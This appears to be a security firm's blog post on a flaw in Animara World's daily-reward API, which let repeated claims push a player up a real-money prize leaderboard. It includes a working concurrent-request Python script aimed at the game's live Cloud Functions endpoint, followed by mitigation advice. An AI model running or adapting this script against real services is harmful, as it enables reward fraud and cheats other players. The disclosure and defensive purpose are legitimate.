Pentesting Animara World
Uncovering a Critical Vulnerability in Animara World’s Daily Rewards
At Borg Security, our mission is to identify and address vulnerabilities that threaten the integrity of digital platforms. During a recent assessment of Animara World, we discovered a significant flaw in its daily reward system—a vulnerability that allowed attackers to bypass restrictions, gain an unfair advantage, and earn real money in prizes by exploiting the system.
About Animara
Animara is a virtual world platform that integrates blockchain technology, NFTs, and various game mechanics such as Tap to Earn, Play to Earn, and Hunt to Earn. These features are designed to engage users across gaming, virtual reality, and digital art spaces.
The Issue
Animara World’s daily reward system grants players golden tokens to upgrade biomes and earn Explora points, which determine leaderboard rankings. Each player is meant to receive one token every 24 hours. However, we uncovered a critical oversight: the backend system did not enforce this restriction.
Attackers could exploit this gap to repeatedly claim tokens, amassing resources far beyond what was intended. This not only disrupted fair play but also posed a financial risk, as top leaderboard positions awarded real-money prizes, including $30,000 USDC.
How the Exploit Worked
The vulnerability was caused by an API endpoint that failed to verify if rewards had already been claimed. By automating requests, attackers could repeatedly claim tokens and use them to upgrade biomes, rapidly increasing Explora points and leaderboard positions.
Here’s a simplified example of how this could be exploited:
import requests
from concurrent.futures import ThreadPoolExecutor
json_data = {'data': {'idToken': '<your_jwt_token>'}}
def send_request():
response = requests.post(
'https://us-central1-animara-38a73.cloudfunctions.net/dailyLogin',
json=json_data,
verify=False,
)
print(response.text)
with ThreadPoolExecutor(max_workers=50) as executor:
executor.map(lambda _: send_request(), range(1000))
Using an automated script, attackers could bypass the 24-hour limit, generating large amounts of in-game currency and unfairly dominating the leaderboards.
An API endpoint dispensing daily rewards failed to validate if claims were duplicated. Attackers exploited this by automating requests to collect unlimited tokens, using them to boost Explora points and dominate leaderboards
By running the script we managed to climb to 1st place on the leaderboard in a few minutes.
The Consequences
This vulnerability disrupted Animara World’s ecosystem, creating an uneven playing field where attackers could dominate leaderboards and overshadow legitimate players. The exploit not only devalued the efforts of honest participants but also undermined the platform’s competitive integrity and user trust. With real-money prizes at stake, the financial implications were serious, and restoring confidence became essential to preserving the platform’s reputation.
Mitigation Steps
Addressing the vulnerability required reinforcing security on both the frontend and backend. Backend validation is essential to enforce restrictions like limiting daily claims, while monitoring API activity helps detect abuse. Frontend measures, such as rate limiting, can add an extra layer of protection but must complement strong server-side checks. Together, these practices help prevent similar exploits.
Lessons Learned
This case highlights the importance of robust backend validation and comprehensive security practices. Even seemingly minor oversights can lead to significant vulnerabilities, affecting both user trust and financial stability.
How Borg Security Can Help
At Borg Security, we specialize in uncovering and addressing vulnerabilities across digital platforms. Our expertise ensures your systems are secure, your users are protected, and your reputation remains intact. Contact us today to learn how we can help safeguard your platform against emerging threats.